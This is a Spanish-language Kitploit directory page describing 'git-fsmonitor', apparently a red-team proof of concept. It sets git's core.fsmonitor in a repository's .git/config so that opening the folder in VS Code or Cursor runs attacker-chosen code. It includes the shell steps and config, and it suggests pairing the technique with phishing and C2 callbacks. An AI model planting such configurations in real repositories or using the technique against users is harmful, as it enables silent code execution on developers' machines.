Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
git-fsmonitor — Esta es una prueba de concepto para abusar de "fsmonitor" contra IDE. | Kitploit
Herramientas/GitHubGitHub/rootup/git-fsmonitor
Herramientas de PhishingMecanismos de PersistenciaComando y ControlIngeniería SocialRed Teaming
GitHubrootup/git-fsmonitor

git-fsmonitor

Esta es una prueba de concepto para abusar de "fsmonitor" contra IDE.

Ver Repositorio
4996hace 9 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Este es un problema documentado (conocido), pero lo encontré durante mi investigación y es bastante útil para RT/PT.

Resumen: El helper FSMonitor es ejecutado por git en cada comando como git status, git diff, etc., por lo que git lanzará ciegamente cualquier ruta que especifiquemos allí. Nuestros IDEs ejecutan git status automáticamente en el momento en que abres una carpeta para poblar su panel SCM (Source Control Management);

Lo que permite a git ejecutar el helper configurado que ejecuta código controlado por el atacante. Esta técnica puede usarse durante RT o en un escenario de asunción de compromiso con cualquier C2 o nuestro XRayC2 para obtener un callback que evade las defensas de red tradicionales. (Por supuesto, se requieren correos de phishing para engañar al usuario final, pero abrir una carpeta en el IDE parece una operación justa).

Prueba de concepto: git clone este repositorio, añade la configuración siguiente en tu directorio .git. Una vez hecho, abre la carpeta modificada con el IDE, debería aparecer una calculadora. (He probado esto con Code y Cursor). Este POC es específico de macOS, modifícalo según tu entorno.

root@kitploit:~
bash-3.2$ cd git-fsmonitor
bash-3.2$ mkdir .git
bash-3.2$ nano .git/config
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
	ignorecase = true
	precomposeunicode = true
	fsmonitor = ./icons/icons.sh
bash-3.2$ chmod +x ./icons/icons.sh
bash-3.2$ git init
bash-3.2$ git config core.fsmonitor ./icons/icons.sh
bash-3.2$ ls git-fsmonitor-main/.git/
.DS_Store    config       description  HEAD         hooks/       info/        objects/     refs/        
bash-3.2$

Probado en Code

root@kitploit:~
Version: 1.106.0 (Universal)
Commit: ac4cbdf48759c7d8c3eb91ffe6bb04316e263c57
Date: 2025-11-11T16:02:25.943Z
Electron: 37.7.0
ElectronBuildId: 12597478
Chromium: 138.0.7204.251
Node.js: 22.20.0
V8: 13.8.258.32-electron.0
OS: Darwin x64 25.1.0

https://github.com/user-attachments/assets/4702aadc-f12d-4380-bc6f-bcd564ddcf96

Esto funciona porque inicializamos el repositorio y luego añadimos core.fsmonitor a un archivo (que puede ser un payload). Por lo tanto, abrir una carpeta es suficiente para ejecutar tu código. La "mayoría" de los desarrolladores/usuarios tienen ~/Downloads (y carpetas de nivel superior similares) en su espacio de trabajo de confianza, por lo que el PoC se ejecuta silenciosamente; pero si un repositorio está fuera de esas rutas de confianza, el IDE preguntará "¿confiar en este editor?" antes de leer .git/config.

Descargar herramienta